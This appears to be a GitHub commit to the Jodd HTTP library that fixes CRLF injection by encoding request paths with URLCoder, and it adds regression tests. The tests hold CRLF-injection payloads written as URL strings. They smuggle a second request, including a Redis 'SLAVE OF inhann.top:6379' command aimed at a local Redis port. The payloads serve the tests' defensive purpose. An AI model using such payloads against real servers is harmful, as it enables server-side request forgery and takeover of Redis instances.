Encode with URLCoder (closes #9)

oblac · Apr 18, 2022 · e50f573 · e50f573
1 parent 1c99347
commit e50f573
Show file tree

Hide file tree

Showing 2 changed files with 59 additions and 22 deletions.
diff --git a/src/main/java/jodd/http/HttpRequest.java b/src/main/java/jodd/http/HttpRequest.java
@@ -27,6 +27,7 @@
 
 import jodd.net.HttpMethod;
 import jodd.net.MimeTypes;
+import jodd.net.URLCoder;
 import jodd.util.Base64;
 import jodd.util.StringPool;
 import jodd.util.StringUtil;
@@ -37,7 +38,6 @@
 import java.io.InputStreamReader;
 import java.io.OutputStream;
 import java.io.UnsupportedEncodingException;
-import java.net.URLEncoder;
 import java.nio.charset.StandardCharsets;
 import java.util.Map;
 import java.util.concurrent.CompletableFuture;
@@ -337,40 +337,37 @@ public String path() {
 	 * Adds a slash if path doesn't start with one.
 	 * Query will be stripped out from the path.
 	 * Previous query is discarded.
+	 *
 	 * @see #query()
 	 */
-	public HttpRequest path(String path){
+	public HttpRequest path(String path) {
 		// this must be the only place that sets the path
 
 		if (!path.startsWith(StringPool.SLASH)) {
 			path = StringPool.SLASH + path;
 		}
 
-		try {
-			// remove fragment
-			final int fragmentIndex = path.indexOf('#');
-			if (path.indexOf('#') != -1) {
-				this.fragment = URLEncoder.encode(path.substring(fragmentIndex + 1), StandardCharsets.UTF_8.name());
-				path = path.substring(0, fragmentIndex);
-			}
-
-			final int ndx = path.indexOf('?');
+		// remove fragment
+		final int fragmentIndex = path.indexOf('#');
+		if (path.indexOf('#') != -1) {
+			this.fragment = URLCoder.encodePath(path.substring(fragmentIndex + 1), StandardCharsets.UTF_8);
+			path = path.substring(0, fragmentIndex);
+		}
 
-			if (ndx != -1) {
-				final String queryString = path.substring(ndx + 1);
+		final int ndx = path.indexOf('?');
 
-				path = URLEncoder.encode(path.substring(0, ndx), StandardCharsets.UTF_8.name());
+		if (ndx != -1) {
+			final String queryString = path.substring(ndx + 1);
 
-				query = HttpUtil.parseQuery(queryString, true);
-			} else {
-				query = HttpMultiMap.newCaseInsensitiveMap();
-			}
+			path = URLCoder.encodePath(path.substring(0, ndx), StandardCharsets.UTF_8);
 
-			this.path = URLEncoder.encode(path, StandardCharsets.UTF_8.name());
-			;
-		}catch (UnsupportedEncodingException e) {
-			return null;
+			query = HttpUtil.parseQuery(queryString, true);
+		} else {
+			query = HttpMultiMap.newCaseInsensitiveMap();
 		}
+
+		this.path = URLCoder.encodePath(path, StandardCharsets.UTF_8);
+
 		return this;
 	}
 

diff --git a/src/test/java/jodd/http/CRLFInjectionTest.java b/src/test/java/jodd/http/CRLFInjectionTest.java
@@ -0,0 +1,40 @@
+package jodd.http;
+
+import jodd.net.URLCoder;
+import org.junit.jupiter.api.Test;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+
+class CRLFInjectionTest {
+
+	@Test
+	void testGet_crlf_injection() {
+		String url = "http://127.0.0.1:6379/ \rfoo";//"HTTP/1.1\r\nHost: 127.0.0.13:1099\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
+		HttpRequest req = HttpRequest.get(url);
+
+		assertEquals("GET /%20%0Dfoo HTTP/1.1", req.toString().split("\n")[0].trim());
+	}
+
+	@Test
+	void testGet_crlf_injection_path() {
+		String url = "http://127.0.0.1:6379/";
+		HttpRequest req = HttpRequest.get(url).path(" \rfoo");
+
+		assertEquals("GET /%20%0Dfoo HTTP/1.1", req.toString().split("\n")[0].trim());
+	}
+
+	@Test
+	void testGet_crlf_injection2() {
+		String path = " HTTP/1.1\n" +
+				"Host: 127.0.0.13:1099\n" +
+				"\n" +
+				"SLAVE OF inhann.top:6379\n" +
+				"\n" +
+				"POST /";
+		String url = "http://127.0.0.1:6379/" + path;
+		HttpRequest req = HttpRequest.get(url);
+
+		assertEquals("GET /" + URLCoder.encodePath(path) + " HTTP/1.1", req.toString().split("\n")[0].trim());
+	}
+
+}